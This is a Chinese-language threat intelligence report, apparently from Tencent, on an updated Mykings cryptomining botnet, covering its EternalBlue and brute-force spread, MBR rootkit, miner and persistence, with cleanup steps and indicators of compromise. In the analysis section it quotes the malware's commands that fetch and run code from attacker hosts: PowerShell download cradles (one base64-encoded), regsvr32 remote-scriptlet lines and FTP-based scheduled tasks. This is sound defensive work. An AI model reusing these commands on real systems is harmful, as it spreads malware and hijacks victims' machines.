背景騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網(wǎng)絡更新基礎設施，病毒啟用了新的域名，挖礦使用新的錢包收益已超過60萬人民幣，

背景

騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網(wǎng)絡更新基礎設施，病毒啟用了新的域名，挖礦使用新的錢包收益已超過60萬人民幣，并且仍每天以約10個XMR的速度挖掘。

Mykings通過1433端口爆破、永恒之藍漏洞攻擊等方法進入系統(tǒng)，然后植入RAT、Miner等木馬，組成龐大的僵尸網(wǎng)絡。

Mykings挖礦僵尸網(wǎng)絡更新版本具有以下特點：

1. 利用永恒之藍漏洞、1433端口爆破等方法進行攻擊，并包含Mirai僵尸網(wǎng)絡的感染代碼。

2. 感染MBR(感染流程與暗云病毒一致)，通過Rookit對抗殺軟以及下載Payload。

3. 清除競品挖礦木馬，關閉端口封堵其他病毒的入侵渠道。

4. 通過安裝多個計劃任務后門、WMI后門進行持久化。

Mykings挖礦僵尸網(wǎng)絡

詳細分析

被感染設備通過WMI后門執(zhí)行Powershell命令

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;

然后從blue.txt中獲取3個木馬的下載地址，依次下載和執(zhí)行：

上述三個木馬分析如下：

ok.exe

ok.exe功能為感染MBR。從而實現(xiàn)自保護，殺軟對抗，以及聯(lián)網(wǎng)下載payload的功能。

感染流程與騰訊御見威脅情報中心發(fā)現(xiàn)的暗云系列病毒(參考https://s.tencent.com/research/report/622.html)類似。MBR木馬在最后一個階段對ZwCreateSection進行HOOK， 在獲得執(zhí)行機會后將rootkit映射到內(nèi)核空間并執(zhí)行，最后跳轉到ZwCreateSection繼續(xù)執(zhí)行。

Rootkit主要功能為自保護, 結束殺軟進程，及注入系統(tǒng)進程winlogon.exe聯(lián)網(wǎng)下載payload執(zhí)行下一階段的惡意行為。

Rootkit獲取用于更新木馬的IP地址http[:]//www.upme0611.info/address.txt

獲取下一階段Payload代碼配置文件http[:]//mbr.kill0604.ru/cloud.txt，從該配置文件中得到挖礦模塊upsupx.exe的下載地址，隨后下載執(zhí)行該文件。

upsupx.exe

upsupx.exe被下載保存至C:\Windows\Temp\conhost.exe執(zhí)行。下載解密挖礦相關配置文件到C:\Program Files\Common Files\xpdown.dat，配置文件內(nèi)容如下：

45.58.135.106

74.222.14.61

139.5.177.10

ok.xmr6b.ru

獲取要清除的競爭對手或者老版本的挖礦木馬，包括文件名、路徑、是否清除。

然后通過讀注冊表位置(HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)

檢測CPU類型及頻率,根據(jù)CPU的類型和頻率確定使用哪種類型的挖礦程序。

下載開源挖礦程序XMRig,地址為http[:]//198.148.90.34/64work.rar，程序版本2.14.1，挖礦程序啟動路徑為C:\Windows\inf\lsmm.exe

啟動后從資源文件中獲取挖礦配置文件，得到礦池地址：pool.minexmr.com:5555

錢包455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

根據(jù)錢包查詢收益：已挖礦獲得1077個XMR

當前市場價格折合人民幣60萬元

u.exe

u.exe利用攻擊模塊C:\Windows\system\msinfo.exe對內(nèi)網(wǎng)以及外網(wǎng)機器IP段進行掃描攻擊，方法包括利用永恒之藍漏洞、SQL爆破、Telnet爆破、RDP爆破等，部分攻擊payload還包含感染mirai僵尸網(wǎng)絡的相關代碼。

掃描445/1433等端口

永恒之藍漏洞攻擊

SQL爆破攻擊

爆破登錄后執(zhí)行Shellcode

Telnet爆破攻擊

RDP爆破攻擊

持久化

Myings挖礦僵尸網(wǎng)絡會使用以下手法進行持久化：

1. 刪除其他病毒設置的登錄賬戶

通過net user刪除賬戶mm123$、admin、sysadm05;attrib命令設置Temp目錄下文件為隱藏屬性;taskkill殺死其他挖礦進程，刪除其他挖礦進程文件、遠程桌面程序文件;cacls設置部分目錄及文件的可見性。

通過wmic命令刪除偽裝成系統(tǒng)進程的挖礦程序，判斷依據(jù)為文件為系統(tǒng)進程名，但是卻不在系統(tǒng)目錄下。

2.設置相關文件、路徑的屬性為隱藏

3.關閉系統(tǒng)自更新

刪除以下計劃任務，關閉系統(tǒng)自更新：

SCHTASKS/Delete/TN"WindowsUpdate1"/F&SCHTASKS/Delete/TN"WindowsUpdate3"/F&SCHTASKS/Delete/TN"Windows_Update"/F&SCHTASKS/Delete/TN"Update"/F&SCHTASKS/Delete/TN"Update2"/F&SCHTASKS/Delete/TN"Update4"/F&SCHTASKS/Delete/TN"Update3"/F&SCHTASKS/Delete/TN"windowsinit"/F&SCHTASKS/Delete/TN"SystemSecurityCheck"/F&SCHTASKS/Delete/TN"AdobeFlashPlayer"/F&SCHTASKS/Delete/TN"updat_windows"/F&SCHTASKS/Delete/TN"at1"/F&SCHTASKS/Delete/TN"at2"/F&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Enterprise]"/F&SCHTASKS/DELETE/TN"\Microsoft\Windows\UPnP\Services"/f&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Standard]"/F

4.阻止139/445等端口的連接

網(wǎng)絡防火墻設置，設置65536端口的連接請求為允許，設置135/137/138/139/445端口的連接為拒絕。

5.添加注冊表啟動項

添加注冊表Run啟動項：

6.添加大量計劃任務后門

添加5個計劃任務：

任務1：Mysa

執(zhí)行：cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe

任務2：Mysa1

執(zhí)行：rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

任務3：Mysa2

執(zhí)行：cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

任務4：Mysa3

執(zhí)行：/c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe

任務5：ok

執(zhí)行：cmd c:\windows\debug\ok.dat,ServiceMainaaaa

各計劃任務后門功能整理如下：

7.添加執(zhí)行大量命令的WMI后門

通過創(chuàng)建WMI事件過濾器和消費者來添加后門。

刪除舊的事件過濾器和消費者：

fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4

創(chuàng)建新的事件過濾器和消費者：

fuckyoumm3

fuckyoumm4

WMI后門執(zhí)行的代碼為：

(1)powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

(解碼后：

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;})

(2)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4)powershell.exe IEX

(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5)regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll

(6)regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll

WMI后門執(zhí)行的命令功能整理如下：

安全建議

1、MS010-17 “永恒之藍”漏洞

服務器暫時關閉不必要的端口(如135、139、445)，方法可參考：https://guanjia.qq.com/web_clinic/s8/585.html

下載并更新Windows系統(tǒng)補丁，及時修復永恒之藍系列漏洞

XP、WindowsServer2003、win8等系統(tǒng)訪問：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、WindowsServer 2008、Windows10,WindowsServer2016等系統(tǒng)訪問：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2、服務器使用高強度密碼，切勿使用弱口令，防止黑客暴力破解;

3、使用殺毒軟件攔截可能的病毒攻擊;

4、感染Mykings病毒的用戶除了使用騰訊御點進行查殺外，還可通過以下步驟進行手動清理：

1)刪除文件

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\Help\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2)刪除注冊表

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3)刪除計劃任務

Mysa

Mysa1

Mysa2

Mysa3

ok

4)刪除WMI事件過濾器及消費者

fuckyoumm2_filter fuckyoumm2_consumer WindowsEventsFilter WindowsEventsConsumer4 WindowsEventsConsumer fuckayoumm3 fuckayoumm4

fuckyoumm3

fuckyoumm4

IOCs

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

A1B9F55BF93E82550B4C21CD3230C3C3

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

74.222.14.61

54.255.141.50

Domain

www.upme0611.info

mbr.kill0604.ru

ok.xmr6b.ru

js.0603bye.info

pc.pc0416.xyz

down2.b5w91.com

wmi.1217bye.host

down.mys2018.xyz

URL

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/address.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//208.110.71.194/cloud.txt

http[:]//185.22.172.13/upsupx.exe

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//173.208.139.170/2.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

錢包：455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

參考鏈接

https://www.freebuf.com/articles/web/146393.html

https://s.tencent.com/research/report/622.html

https://www.freebuf.com/column/187489.html

來源：騰訊御見威脅情報中心

關鍵詞： Mykings 挖礦錢包 收益